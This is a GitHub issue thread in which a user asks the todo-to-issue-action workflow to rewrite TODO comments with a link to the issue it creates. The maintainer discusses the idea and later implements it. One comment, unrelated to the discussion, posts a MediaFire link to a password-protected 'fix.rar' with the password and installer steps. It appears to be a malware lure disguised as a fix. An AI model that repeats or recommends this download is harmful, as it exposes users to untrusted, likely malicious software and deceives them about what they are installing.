### ISSUE TITLE
Feature: Update TODO with link to created Issue

### ISSUE THREAD

**Issue by tomek-i** [alstr/todo-to-issue-action#199]
**Praise:** This workflow is amazing and I really love it. Just recently came across this and have been plying around a little.

In the teams I am working with, we use a fairly strict process in terms on PRs and code reviews and if the code change contains any TODO comments without any link to an issue then we flag it / reject the PR.

What would be fantastic is if the workflow, once the ISSUE is created updates the TODO with a link to the issue eg:

```
// BEFORE

// TODO: need to update this example
const test = () => console.log("test")


// AFTER

// TODO: https://github.com/<username>/<repo-name>/issue/25 need to update this example
const test = () => console.log("test")

// ALTERNATIVE

// TODO: need to update this example
// https://github.com/<username>/<repo-name>/issue/25
const test = () => console.log("test")

```

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by alstr** [comment]
Sounds good in theory. With it having to modify the files I'm not sure how best to go about that. That would be the main challenge.

**Comment by tomek-i** [comment]
> Sounds good in theory. With it having to modify the files I'm not sure how best to go about that. That would be the main challenge.

I'm not entirely sure about the capabilities on the bot but if it gets write access to the branch/repo it could potentially directly write it or create an automated commit.

I have seen with the CodiumAI Agent on button press it can create a code suggestion/commit on gh, perhaps that could be used.

**Comment by alstr** [comment]
I've managed to add this functionality and it will be in the next major version (coming soon).

**Comment by tomek-i** [comment]
Wow!❤️🎉Gotta try it out! Thanks for the implementation. I will play around with it and see what the others are thinking
